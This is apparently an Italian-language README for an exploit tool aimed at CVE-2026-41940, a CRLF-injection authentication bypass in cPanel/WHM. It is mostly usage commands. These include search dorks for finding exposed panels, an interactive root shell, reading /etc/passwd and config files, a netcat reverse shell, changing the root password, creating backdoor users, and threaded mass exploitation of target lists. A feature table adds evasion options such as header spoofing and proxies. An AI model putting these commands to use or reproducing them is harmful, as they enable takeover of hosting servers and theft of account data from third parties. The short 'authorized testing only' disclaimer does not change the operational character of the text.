
🚀 CVE-2026-41940 Exploit di Bypass di Autenticazione cPanel/WHM - Miglior Flusso 💥 L'iniezione CRLF porta a bypass di autenticazione, dirottamento di sessione e fuga di account. ✅ Proxy, UA personalizzato, keep-alive, tentativi, verifica SSL, output colorato, supporto per salvataggio su file. ⚡ PoC avanzato per pentester.

Edizione cPanel & WHM - Iniezione CRLF per Bypass dell'Autenticazione e Hijacking Completo della Sessione
Questo exploit sfrutta CVE-2026-41940, una vulnerabilità critica di bypass dell'autenticazione in cPanel/WHM. Iniettando un payload CRLF appositamente modificato nel sistema di gestione delle sessioni, ottiene l'hijacking della sessione, l'accesso root e il controllo completo del pannello di hosting senza alcuna credenziale valida.
port:2087 "cPanel" "WHM"
port:2083 "cPanel"
⚠️ Disclaimer: Questo strumento è solo per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato è illegale.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit
# Install dependencies
pip3 install -r requirements.txt
# Run
python3 exploit.py -t https://example.com:2087
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087
# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt
# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v
# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i
[email protected] $ accounts # List all cPanel accounts
[email protected] $ version # Show cPanel version
[email protected] $ ls /home # List directory
[email protected] $ cat /etc/passwd # Read file
[email protected] $ exec id # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123 # Create new user
[email protected] $ exit # Exit shell
## 🔧 Esecuzione Remota di Comandi
```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"
# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php
# Attacker machine (listener)
nc -lvnp 4444
# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"
# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234
# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive # Disable auto keep-alive
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20
# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443
# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080
# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5
# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify
docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102
docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102
Dai un'occhiata ai miei altri repository di exploit:
| Categoria | Caratteristiche |
|---|
| Sfruttamento | ✅ Bypass dell'Autenticazione tramite Iniezione CRLF ✅ Hijacking della Sessione WHM ✅ Perdita del Token di Sicurezza ✅ Accesso Root Immediato |
| Post-Sfruttamento | ✅ Estrazione dell'Elenco Account (Utente + Dominio) ✅ Esecuzione Remota di Comandi (RCE) ✅ Reverse Shell (compatibile netcat) ✅ Lettura File (config, log, ecc.) ✅ Cambio Password Root ✅ Creazione Nuovo Utente cPanel |
| Scansione | ✅ Sfruttamento Singolo Target ✅ Scansione Multi-Target di Massa ✅ Multi-Threading (thread configurabili) ✅ Supporto Port Override |
| Furtività | ✅ Ritardi Casuali tra le Richieste ✅ Spoofing X-Forwarded-For ✅ Supporto User-Agent Personalizzato ✅ Supporto Proxy (HTTP/HTTPS) |
| Usabilità | ✅ Shell WHM Interattiva (-i)✅ Output Colorato (colorama) ✅ Modalità Verbose/Debug ✅ Esportazione Elenco Account su File ✅ Thread di Sessione Keep-Alive ✅ Meccanismo di Riprova per Connessioni Instabili |
| Prodotto | Versioni | Stato |
|---|
| cPanel & WHM | 11.92 - 11.102 | ✅ Confermato |
| cPanel & WHM | 11.104 - 11.110 | ✅ Confermato |
| cPanel & WHM | 11.118 - 11.136 | ⚠️ Limitato |
| cPanel & WHM | < 11.86 | ✅ Possibilmente vulnerabile |
| Breve | Lungo | Descrizione | Predefinito |
|---|
-t | --target | URL del singolo target | Required (single) |
-l | --target-file | File contenente l'elenco dei target | Required (mass) |
-p | --port | Porta di override | Auto-detect |
-o | --output | Salva elenco account su file | None |
-v | --verbose | Abilita output debug | False |
-i | --interactive | Shell WHM interattiva | False |
--proxy | Proxy HTTP/HTTPS | None | |
-ua | --user-agent | User-Agent personalizzato | Random |
--cmd | Esegui un singolo comando | None | |
--reverse-shell | Reverse shell IP:PORTA | None | |
--passwd | Cambia password root | None | |
--adduser | Crea nuovo utente (UTENTE DOMINIO PASSWORD) | None | |
--read | Leggi file dal target | None | |
--threads | Thread per scansione di massa | 10 | |
--delay | Intervallo keep-alive (secondi) | 3.0 | |
--max-retries | Massimo tentativi per richiesta | 3 | |
--no-keep-alive | Non mantenere la sessione | False | |
--ssl-verify | Verifica certificati SSL | False |